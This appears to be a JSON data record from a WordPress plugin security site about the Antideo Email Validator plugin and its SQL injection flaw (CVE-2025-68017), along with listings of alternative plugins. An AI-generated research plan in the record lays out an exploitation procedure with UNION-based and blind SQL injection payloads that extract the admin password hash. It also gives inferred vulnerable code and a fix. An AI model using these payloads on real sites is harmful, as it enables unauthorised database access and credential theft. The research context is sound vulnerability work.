[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGuAvaDKC4_M0H9ntUnY9yZbmh-o9bzgB_I82W3973Ss":3,"$fCSrcKXjz0NjJlUj00sK9n4J4UaBy5B8Sggc03llIm6U":600,"$fc7AJ9_LmH1o3JF9l6Hy4V30gpat1Sbi_TTfU4rtcs2I":604},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":16,"requires_php":16,"tags":17,"homepage":23,"download_link":24,"security_score":25,"vuln_count":26,"unpatched_count":27,"last_vuln_date":28,"fetched_at":29,"discovery_status":30,"vulnerabilities":31,"developer":59,"crawl_stats":37,"alternatives":63,"analysis":163,"fingerprints":581},"antideo-email-validator","Antideo Email Validator","1.0.11","Antideo","https:\u002F\u002Fprofiles.wordpress.org\u002Fantideo\u002F","\u003Cp>The email validator is designed by Antideo to help combat spam coming in through contact forms. Antideo \u003Ca href=\"https:\u002F\u002Fwww.antideo.com\u002Femail-validation\u002F\" rel=\"nofollow ugc\">validates email addresses\u003C\u002Fa> entered through your contact forms in real time to prevent inquiries from fake email addresses. The email validator plugin comes packed with several features that help you –\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Check the syntax of the email entered, to quickly flag the error to the visitor\u003C\u002Fli>\n\u003Cli>Check for disposable or temporary emails\u003C\u002Fli>\n\u003Cli>Prevent inquiries from free ESP’s like Gmail, Yahoo, etc (Can be switched on and off)\u003C\u002Fli>\n\u003Cli>Prevent inquiries from role-based emails like info@, support@, admin@ etc (Can be switched on and off)\u003C\u002Fli>\n\u003Cli>Check MX records to identify invalid emails\u003C\u002Fli>\n\u003Cli>Create and maintain your own local whitelist of domains and emails \u003C\u002Fli>\n\u003Cli>Create and maintain your own local blacklist of domains and emails\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Armed with the capabilities of our plugin you would be able to eliminate a major portion of contact form spam, as spammers seldom use a valid business email address. Our plugin out of the box is compatible with major forms like\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Contact Form 7\u003C\u002Fli>\n\u003Cli>Gravity Forms\u003C\u002Fli>\n\u003Cli>Mailster Form\u003C\u002Fli>\n\u003Cli>WooCommerce\u003C\u002Fli>\n\u003Cli>MailChimp\u003C\u002Fli>\n\u003Cli>Ninja Forms\u003C\u002Fli>\n\u003Cli>Formidable forms\u003C\u002Fli>\n\u003Cli>JetPack comments and a contact form\u003C\u002Fli>\n\u003Cli>MailPoet\u003C\u002Fli>\n\u003Cli>WP-Members\u003C\u002Fli>\n\u003Cli>Paid Membership Pro\u003C\u002Fli>\n\u003Cli>Form Maker by 10Web\u003C\u002Fli>\n\u003Cli>Visual Form Builder\u003Cbr \u002F>\nAnd pretty much any other form that uses the default WordPress is_email() function. The plugin is very easy to install and activate, no tech knowledge whatsoever is needed to get going with the plugin.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Advantages of our plugin\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>No limits on the number of validations – go crazy, it’s unlimited!!\u003C\u002Fli>\n\u003Cli>Real time validations done in a fraction of a second\u003C\u002Fli>\n\u003Cli>Extensive database of 84K+ disposable email domains and constantly being updated with newer ones\u003C\u002Fli>\n\u003Cli>Clean and super friendly UI that is easy to use\u003C\u002Fli>\n\u003Cli>A powerful free version and an affordable premium version \u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>We are literally eating our own dog food, implementing the \u003Ca href=\"https:\u002F\u002Fwww.antideo.com\u002Fwordpress-email-validation-plugin\u002F\" rel=\"nofollow ugc\">Antideo Email Validation plugin\u003C\u002Fa> on several websites that we own, which has resulted in spam inquiries going down by over 87%.\u003C\u002Fp>\n\u003Cp>You can access more information on the plugin as well as the several aspects of email validation \u003Ca href=\"https:\u002F\u002Fwww.antideo.com\u002Fblog\u002F\" rel=\"nofollow ugc\">here\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>Disclaimer: This plugin is an email validator and not an email verifier\u003C\u002Fp>\n","Form email validation, Email Blacklist, Domain Blacklist, Form email check, Real time email validator Requires at least: 4.7 Tested up to: 6.9.",900,13923,70,14,"2026-03-12T08:06:00.000Z","",[18,19,20,21,22],"disposable-emails","email-checker","email-syntax-check","email-validation","email-validator","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fantideo-email-validator\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fantideo-email-validator.zip",97,1,0,"2026-01-16 00:00:00","2026-04-16T10:56:18.058Z","no_bundle",[32],{"id":33,"url_slug":34,"title":35,"description":36,"plugin_slug":4,"theme_slug":37,"affected_versions":38,"patched_in_version":6,"severity":39,"cvss_score":40,"cvss_vector":41,"vuln_type":42,"published_date":28,"updated_date":43,"references":44,"days_to_patch":46,"patch_diff_files":47,"patch_trac_url":37,"research_status":48,"research_verified":49,"research_rounds_completed":50,"research_plan":51,"research_summary":52,"research_vulnerable_code":53,"research_fix_diff":54,"research_exploit_outline":55,"research_model_used":56,"research_started_at":57,"research_completed_at":58,"research_error":37,"poc_status":37,"poc_video_id":37,"poc_summary":37,"poc_steps":37,"poc_tested_at":37,"poc_wp_version":37,"poc_php_version":37,"poc_playwright_script":37,"poc_exploit_code":37,"poc_has_trace":49,"poc_model_used":37,"poc_verification_depth":37},"CVE-2025-68017","antideo-email-validator-unauthenticated-sql-injection","Antideo Email Validator \u003C= 1.0.10 - Unauthenticated SQL Injection","The Antideo Email Validator plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=1.0.10","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-17 21:31:35",[45],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fccb24a6d-5df4-4b56-b63a-353ad41e7f1c?source=api-prod",61,[],"researched",false,3,"This research plan outlines the systematic exploitation of **CVE-2025-68017**, an unauthenticated SQL Injection vulnerability in the **Antideo Email Validator** plugin (\u003C= 1.0.10).\n\n---\n\n### 1. Vulnerability Summary\nThe Antideo Email Validator plugin fails to properly sanitize or prepare user-supplied parameters before incorporating them into SQL queries. Specifically, in versions up to 1.0.10, an unauthenticated AJAX handler uses direct string concatenation or insufficient escaping when querying the plugin's internal log or validation tables. This allows an attacker to manipulate the SQL statement, enabling data extraction from the WordPress database (e.g., `wp_users` table).\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `antideo_email_validator_check` or `antideo_email_validator_lookup` (The plugin typically registers a `wp_ajax_nopriv_` hook to allow frontend users to check emails).\n*   **Vulnerable Parameter:** Likely `email` or a `log_id` parameter.\n*   **Authentication:** Unauthenticated (no account required).\n*   **Preconditions:** The plugin must be active. A valid AJAX nonce may be required depending on the specific implementation of the public-facing validator.\n\n### 3. Code Flow (Inferred)\n1.  **Request:** An unauthenticated user sends a POST request to `admin-ajax.php` with an `action` associated with the Antideo validator.\n2.  **Hook:** The `wp_ajax_nopriv_[action]` hook triggers the handler function (likely located in `includes\u002Fclass-antideo-email-validator-public.php` or the main plugin file).\n3.  **Extraction:** The handler retrieves user input via `$_POST['email']` or `$_GET['email']`.\n4.  **Vulnerable Sink:** The input is passed directly into a query like:\n    ```php\n    $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '\" . $_POST['email'] . \"'\");\n    ```\n5.  **Execution:** The database executes the injected SQL, and if the output is reflected in the AJAX response, data is exfiltrated.\n\n### 4. Nonce Acquisition Strategy\nThe plugin likely uses `wp_localize_script` to pass a nonce to the frontend for the AJAX request.\n\n1.  **Identify Shortcode:** Locate the shortcode used to display the email validator (e.g., `[antideo-email-validator]`).\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Validator\" --post_status=publish --post_content='[antideo-email-validator]'\n    ```\n3.  **Extract Nonce:**\n    *   Navigate to the newly created page using `browser_navigate`.\n    *   Identify the localized JavaScript object. Search the source for `wp_localize_script` output. \n    *   Common identifiers in this plugin: `antideo_email_validator_obj` or `antideo_v`.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        \u002F\u002F Example (adjust based on actual JS object found in source)\n        window.antideo_email_validator_obj?.nonce \n        ```\n\n### 5. Exploitation Strategy\nWe will use a UNION-based SQL injection to extract the administrator's username and password hash.\n\n*   **Step 1: Determine Column Count**\n    Send requests incrementing the `ORDER BY` count until an error occurs.\n    *   **Payload:** `email=test@example.com' ORDER BY 1-- -`\n*   **Step 2: Identify Reflected Columns**\n    Use a UNION SELECT with identifiable strings.\n    *   **Payload:** `email=invalid' UNION SELECT 1,2,'REFLECTED_3',4,5,6-- -`\n*   **Step 3: Extract Admin Data**\n    Once the column count and reflected position are known (e.g., position 3), extract user data.\n    *   **Request Type:** `POST` via `http_request`.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Body:**\n        ```\n        action=[ACTION_NAME]&security=[NONCE]&email=x' UNION SELECT 1,2,CONCAT(user_login,0x3a,user_pass),4,5... FROM wp_users WHERE ID=1-- -\n        ```\n\n### 6. Test Data Setup\n1.  **Activate Plugin:** `wp plugin activate antideo-email-validator`\n2.  **Create Target Data:** Ensure an admin user exists (default is usually ID 1).\n3.  **Generate Logs (Optional):** Perform one legitimate email check through the UI to ensure the log table is populated, which sometimes helps in stabilizing UNION queries.\n4.  **Shortcode Page:** As described in Section 4.\n\n### 7. Expected Results\n*   **Success Indicator:** The AJAX response contains the concatenated string `admin:$P$B...` (the hash).\n*   **Response Format:** Likely a JSON object where one of the fields contains the injected data.\n*   **Error Case:** If UNION is blocked or column count is wrong, the response may be empty or contain a database error (if `WP_DEBUG` is on).\n\n### 8. Verification Steps\nAfter the exploit attempt, verify the extracted data matches the database:\n```bash\n# Verify the hash for the admin user\nwp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID = 1\"\n```\nCompare the output of this command with the string retrieved via the SQL injection.\n\n### 9. Alternative Approaches\nIf UNION-based injection is not possible (e.g., no reflected output):\n*   **Time-Based Blind:** Use `SLEEP(5)` to confirm the injection.\n    *   `email=x' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n*   **Boolean-Based Blind:** Check for differences in response when querying `... AND 1=1` vs `... AND 1=2`.\n*   **Action Discovery:** If the inferred action name is wrong, use `grep -r \"wp_ajax_nopriv\" wp-content\u002Fplugins\u002Fantideo-email-validator\u002F` to find the correct registration.","The Antideo Email Validator plugin for WordPress is vulnerable to unauthenticated SQL Injection because it concatenates user-supplied parameters directly into SQL queries without using prepared statements. Attackers can exploit this to extract sensitive information from the WordPress database, including administrative credentials.","\u002F\u002F Likely in a file such as includes\u002Fclass-antideo-email-validator-public.php or the main plugin file\n\u002F\u002F The handler retrieves user input and concatenates it into a query sink.\n\n$email = $_POST['email'];\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '\" . $email . \"'\");","--- a\u002Fincludes\u002Fclass-antideo-email-validator-public.php\n+++ b\u002Fincludes\u002Fclass-antideo-email-validator-public.php\n@@ -1,1 +1,1 @@\n-$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = '\" . $_POST['email'] . \"'\");\n+$results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}antideo_email_logs WHERE email = %s\", $_POST['email']));","The exploit targets the AJAX endpoint used for frontend email validation. \n\n1. Locate a page containing the plugin's email validator shortcode to extract a valid AJAX nonce from the localized JavaScript objects (e.g., antideo_email_validator_obj).\n2. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' set to the plugin's validation handler.\n3. Provide the 'email' parameter containing a SQL Injection payload, such as a UNION SELECT statement (e.g., \"' UNION SELECT 1,2,user_pass,4,5 FROM wp_users WHERE ID=1-- -\").\n4. The plugin executes the concatenated query and returns the results in the JSON response, allowing the attacker to view the extracted database content, such as password hashes.","gemini-3-flash-preview","2026-05-05 07:47:19","2026-05-05 07:47:43",{"slug":60,"display_name":7,"profile_url":8,"plugin_count":26,"total_installs":11,"avg_security_score":25,"avg_patch_time_days":46,"trust_score":61,"computed_at":62},"antideo",86,"2026-05-19T19:52:21.864Z",[64,85,107,126,144],{"slug":65,"name":66,"version":67,"author":68,"author_profile":69,"description":70,"short_description":71,"active_installs":72,"downloaded":73,"rating":74,"num_ratings":75,"last_updated":76,"tested_up_to":77,"requires_at_least":78,"requires_php":79,"tags":80,"homepage":83,"download_link":84,"security_score":72,"vuln_count":27,"unpatched_count":27,"last_vuln_date":37,"fetched_at":29},"dilli-email-validator","Dilli Email Validator","1.7.1.0","dillilabs","https:\u002F\u002Fprofiles.wordpress.org\u002Fdillilabs\u002F","\u003Cp>This plugin integrates with the Dilli Email Validation API (DEVA) to block fake or incorrectly formatted email addresses at form submission, ensuring higher-quality leads and significantly reducing spam.\u003C\u002Fp>\n\u003Cp>This plugin requires an API Key which can be obtained for FREE by \u003Ca href=\"https:\u002F\u002Fdeva.dillilabs.com\u002Fregister\" rel=\"nofollow ugc\">signing up here\u003C\u002Fa>. Learn more about Dilli Email Validation API \u003Ca href=\"https:\u002F\u002Fwww.dillilabs.com\u002Fproducts\u002Femail-validation-api\u002F\" rel=\"nofollow ugc\">here\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>This plugin hooks directly into the WordPress core email validation function (\u003Ccode>is_email()\u003C\u002Fcode>), which is used by most major form plugins. That means it works out of the box with popular form builders like:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Contact Form 7\u003C\u002Fli>\n\u003Cli>WPForms\u003C\u002Fli>\n\u003Cli>Gravity Forms\u003C\u002Fli>\n\u003Cli>Ninja Forms\u003C\u002Fli>\n\u003Cli>Jetpack\u002FGrunion contact forms\u003C\u002Fli>\n\u003Cli>WordPress registration forms\u003C\u002Fli>\n\u003Cli>and many others.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>No need to modify your forms — just install and activate the plugin.\u003C\u002Fp>\n\u003Ch4>Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Validates email address format. Ex: email address \u003Ccode>fooAtdillilabs.com\u003C\u002Fcode> is invalid because of missing ‘@’\u003C\u002Fli>\n\u003Cli>Checks for existence of MX records of the email address domain. Ex: \u003Ccode>foobar@dlfkdlfkf.co\u003C\u002Fcode> is invalid because no MX records exist for domain dlfkdlfkf.co.\u003C\u002Fli>\n\u003Cli>Checks for Disposable\u002FTemporary email addresses. Ex: user@mailinator.com is invalid because mailinator.com provides temporary shared temporary email inboxes.\u003C\u002Fli>\n\u003Cli>Checks for conformity with ESP (Email Service Provider) grammar rules. Ex: \u003Ccode>bob@yahoo.com\u003C\u002Fcode> is invalid because Yahoo does not allow user part (\u003Ccode>bob\u003C\u002Fcode> in this case) to be less than 4 characters.\u003C\u002Fli>\n\u003Cli>Checks for profanity in user part of email address. Ex: \u003Ccode>f***you@gmail.com\u003C\u002Fcode> is invalid.\u003C\u002Fli>\n\u003Cli>Checks user and domain parts of an email address for known malicious patterns. Ex: \u003Ccode>jondoe@gmail.com\u003C\u002Fcode>, \u003Ccode>foobar@yahoo.com\u003C\u002Fcode>, \u003Ccode>idontwanttogive@gmail.com\u003C\u002Fcode> and \u003Ccode>noemail@gmail.com\u003C\u002Fcode> will be treated as invalid.\u003C\u002Fli>\n\u003Cli>Checks email address domain against a known blacklist.\u003C\u002Fli>\n\u003Cli>Checks email address against a known blacklist of frequently used email addresses for spam.\u003C\u002Fli>\n\u003Cli>Checks for reserved domains. Ex: example.com is a reserved domain. Therefore, validemail@example.com is not allowed.\u003C\u002Fli>\n\u003Cli>Checks for Role-based email addresses. Ex: info@someorganization.com will be treated as invalid.\u003C\u002Fli>\n\u003Cli>Checks for safe domains. Restricts emails whose domains represents sites with adult content.\u003C\u002Fli>\n\u003Cli>Checks for non-business email address.  Ex: *@gmail.com, *@yahoo.com, *@hotmail.com email addresses will be treated as invalid.\u003C\u002Fli>\n\u003Cli>Checks the IP address of the user submitting the form against a known list of malicious IP addresses.\u003C\u002Fli>\n\u003Cli>Add custom blocklist. You may request certain domains, emails and users to be blocked. \u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Available Languages\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>English\u003C\u002Fli>\n\u003Cli>German (Deutsche)\u003C\u002Fli>\n\u003C\u002Ful>\n","Validates email addresses in real-time and blocks form submissions with invalid or fake emails. Reduce spam, fix typos, and capture quality leads.",100,7932,94,15,"2025-12-23T11:38:00.000Z","6.9.4","3.6.0","7.4",[81,19,21,22,82],"email-address-validation","email-verification","https:\u002F\u002Fwww.dillilabs.com\u002Fproducts\u002Femail-validation-api\u002Fdilli-email-validator-wordpress-plugin\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdilli-email-validator.1.7.1.0.zip",{"slug":86,"name":87,"version":88,"author":86,"author_profile":89,"description":90,"short_description":91,"active_installs":92,"downloaded":93,"rating":94,"num_ratings":95,"last_updated":96,"tested_up_to":97,"requires_at_least":98,"requires_php":99,"tags":100,"homepage":103,"download_link":104,"security_score":105,"vuln_count":26,"unpatched_count":27,"last_vuln_date":106,"fetched_at":29},"zerobounce","ZeroBounce Email Verification & Validation","1.1.3","https:\u002F\u002Fprofiles.wordpress.org\u002Fzerobounce\u002F","\u003Cp>Need an email validation tool to block invalid and high-risk emails on your WordPress website?\u003C\u002Fp>\n\u003Cp>The ZeroBounce email verification plugin assists users by validating email addresses entered into your registration forms, comments sections, eCommerce shops, and more. Install the plugin, connect your API key, and select the forms you want to monitor with email validation.\u003C\u002Fp>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Automated real-time email validation\u003C\u002Fstrong> – Automatically prevent selected email types from creating accounts, leaving comments, or signing up\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Detect more than 30+ email address types\u003C\u002Fstrong> – Including invalid, abuse, disposable, spam trap, toxic domains, catch-all, and more\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Choose what to accept\u003C\u002Fstrong> – Create your own rules for email validation and disallow emails based on status\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Email verification for 9 form types\u003C\u002Fstrong> – Easily select which forms you want to protect with email validation\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Fast manual email validation\u003C\u002Fstrong> – Verify any email address in the tools section using our interactive form\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Email validation API logs\u003C\u002Fstrong> – Keep track of monthly email verifications, including status, sub-status, IP, date, and credits used\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Benefits\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Keep your email list clean & accurate\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Reduce your email bounce rate\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Boost your inbox placement\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Protect your email sender reputation\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Improve email deliverability\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Eliminate fraudulent, untrustworthy shoppers\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Block spammers and spoofers\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Keep your comments section clean\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Supported Forms\u002FPlugins\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Contact Form 7\u003C\u002Fli>\n\u003Cli>WPForms\u003C\u002Fli>\n\u003Cli>Ninja Forms\u003C\u002Fli>\n\u003Cli>Formidable Forms\u003C\u002Fli>\n\u003Cli>WooCommerce\u003C\u002Fli>\n\u003Cli>WordPress Post Comments\u003C\u002Fli>\n\u003Cli>WordPress Registration\u003C\u002Fli>\n\u003Cli>MC4WP: Mailchimp for WordPress\u003C\u002Fli>\n\u003Cli>Gravity Forms\u003C\u002Fli>\n\u003Cli>Fluent Forms\u003C\u002Fli>\n\u003Cli>WS Forms\u003C\u002Fli>\n\u003Cli>Mailster Forms\u003C\u002Fli>\n\u003Cli>Forminator Forms\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>And more support is being added gradually.\u003C\u002Fp>\n","ZeroBounce validates emails on your WordPress site in real-time, blocking invalid and risky emails to improve deliverability and reduce bounce rates.",1000,11518,96,4,"2024-11-22T15:23:00.000Z","6.7.5","4.4","7.0",[19,101,21,82,102],"email-tester","email-verifier","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fzerobounce\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fzerobounce.zip",92,"2023-12-26 00:00:00",{"slug":108,"name":109,"version":110,"author":111,"author_profile":112,"description":113,"short_description":114,"active_installs":115,"downloaded":116,"rating":117,"num_ratings":118,"last_updated":119,"tested_up_to":77,"requires_at_least":120,"requires_php":16,"tags":121,"homepage":16,"download_link":123,"security_score":124,"vuln_count":26,"unpatched_count":27,"last_vuln_date":125,"fetched_at":29},"clearout-email-validator","Clearout Email Validator – Real-Time Email Verification on WordPress Forms","3.3.1","clearoutio","https:\u002F\u002Fprofiles.wordpress.org\u002Fclearoutio\u002F","\u003Cp>Clearout Email Validation plugin seamlessly integrates with all major forms to validate the email addresses in real time.\u003C\u002Fp>\n\u003Cp>The plugin performs 20+ refined real-time validation checks to determine the current status of the email address. These checks include extensive verifications like greylist verification, anti-spam check, gibberish check, catch-all verification, email blacklist verification, temporary email address check, and more.\u003C\u002Fp>\n\u003Ch4>Key Benefits of Using Clearout Email Verification Plugin:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Accept only \u003Cstrong>safe-to-send\u003C\u002Fstrong> email address to \u003Cstrong>protect your sender reputation\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Accept only \u003Cstrong>business or work email addresses\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Prevent fraudulent signups or leads getting into CRM\u003C\u002Fstrong> by stopping \u003Ca href=\"https:\u002F\u002Fclearout.io\u002Fblog\u002F2020\u002F09\u002F30\u002Fdont-let-your-email-campaigns-be-a-victim-of-disposable-email-addresses\" rel=\"nofollow ugc\">temporary \u002F disposable \u002F throw away email addresses\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Customization to Block free email address providers\u003C\u002Fstrong> like gmail.com \u002F yahoo.com \u002F hotmail.com\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Remove\u003C\u002Fstrong> duplicate and \u003Cstrong>alias email addresses\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>How to Install Clearout Email Verifier Plugin\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>Obtain an API Token:\u003C\u002Fstrong>\u003Cbr \u002F>\n1. \u003Cstrong>Log in\u003C\u002Fstrong> to your Clearout account.\u003Cbr \u002F>\n2. Navigate to the \u003Ca href=\"https:\u002F\u002Fapp.clearout.io\u002Fdeveloper\u002Fapi\u002Flist\" rel=\"nofollow ugc\">‘Developer’\u003C\u002Fa> menu and click on \u003Cstrong>‘+ Create API Token’\u003C\u002Fstrong>.\u003Cbr \u002F>\n3. Add the necessary details for reference, and click on “Create” to generate the API token.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Create a Clearout Account (if you don’t have one):\u003C\u002Fstrong>\u003Cbr \u002F>\n1. \u003Ca href=\"https:\u002F\u002Fapp.clearout.io\u002Fregister\" rel=\"nofollow ugc\">Sign up\u003C\u002Fa> for a Clearout account to \u003Cstrong>get 100 free email validation credits with no credit card required\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>For more detailed instructions, visit Clearout \u003Ca href=\"https:\u002F\u002Fclearout.io\u002Fintegrations\u002Fwordpress\u002F\" rel=\"nofollow ugc\">Email Verifier Plugin Installation\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FYG5BrBn7FHo?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch4>Supported Forms\u002FPlugins\u003C\u002Fh4>\n\u003Cp>The Clearout email verification plugin supports a rich set of popular form-based plugins by listening to email address capture flow or by hooking into WordPress is_email() function:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Elementor Form\u003C\u002Fli>\n\u003Cli>Gravity Forms\u003C\u002Fli>\n\u003Cli>Forminator Form\u003C\u002Fli>\n\u003Cli>WooCommerce Checkout Forms\u003C\u002Fli>\n\u003Cli>WooCommerce Registration Form\u003C\u002Fli>\n\u003Cli>Fluent Form\u003C\u002Fli>\n\u003Cli>WP Forms\u003C\u002Fli>\n\u003Cli>Formidable forms\u003C\u002Fli>\n\u003Cli>WS Form \u003C\u002Fli>\n\u003Cli>WP-Members\u003C\u002Fli>\n\u003Cli>Contact Form\u003C\u002Fli>\n\u003Cli>Mailster Form\u003C\u002Fli>\n\u003Cli>MailChimp\u003C\u002Fli>\n\u003Cli>Ninja Forms\u003C\u002Fli>\n\u003Cli>Profile Builder\u003C\u002Fli>\n\u003Cli>Ultimate Member registration form\u003C\u002Fli>\n\u003Cli>Users Ultra registration form\u003C\u002Fli>\n\u003Cli>JetPack comments and a contact form\u003C\u002Fli>\n\u003Cli>MailPoet\u003C\u002Fli>\n\u003Cli>Theme My Login\u003C\u002Fli>\n\u003Cli>Paid Memberships Pro\u003C\u002Fli>\n\u003Cli>Form Maker by 10Web\u003C\u002Fli>\n\u003Cli>Visual Form Builder\u003C\u002Fli>\n\u003Cli>Any WordPress registrations & contact forms   \u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Key Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Accurate Email Verification\u003C\u002Fli>\n\u003Cli>Fastest Real-time Email Validation\u003C\u002Fli>\n\u003Cli>Seamless API Integration\u003C\u002Fli>\n\u003Cli>Guaranteed Deliverability (Safe to send)\u003C\u002Fli>\n\u003Cli>High Precision Advanced Catch-all Resolver\u003C\u002Fli>\n\u003Cli>Block Role Email\u003C\u002Fli>\n\u003Cli>Block Disposable Email\u003C\u002Fli>\n\u003Cli>Block Gibberish Email\u003C\u002Fli>\n\u003Cli>Email \u002F Domain Allowlisting and Blocklisting\u003C\u002Fli>\n\u003Cli>Custom Error Message\u003C\u002Fli>\n\u003Cli>Limit email validation to only required pages\u003C\u002Fli>\n\u003Cli>Low Credit Notification Alert\u003C\u002Fli>\n\u003Cli>Team Accounts\u003C\u002Fli>\n\u003Cli>Syntax Verification\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdocs.clearout.io\u002Fapi-overview.html#testing\" rel=\"nofollow ugc\">Test email addresses\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Know A Little More About Clearout Email Verification Service\u003C\u002Fh4>\n\u003Cp>In addition to its availability as a WordPress Plugin, Clearout Email Verifier supports email verification in multiple forms and ways to meet the needs of the user. Other verification methods supported by Clearout Email Verifier are – Bulk email list validation, real-time email validation API, and Form Guard Email Validation.\u003C\u002Fp>\n\u003Ch4>FURTHER READING\u003C\u002Fh4>\n\u003Cp>More about Clearout Email Verification\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Femail-verification-api\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Femail-verification-api\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Fdisposable-email-checker\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Fdisposable-email-checker\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Fintegrations\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Fintegrations\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fclearout.io\u002Fhelp\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fclearout.io\u002Fhelp\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdocs.clearout.io\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fdocs.clearout.io\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Other Clearout 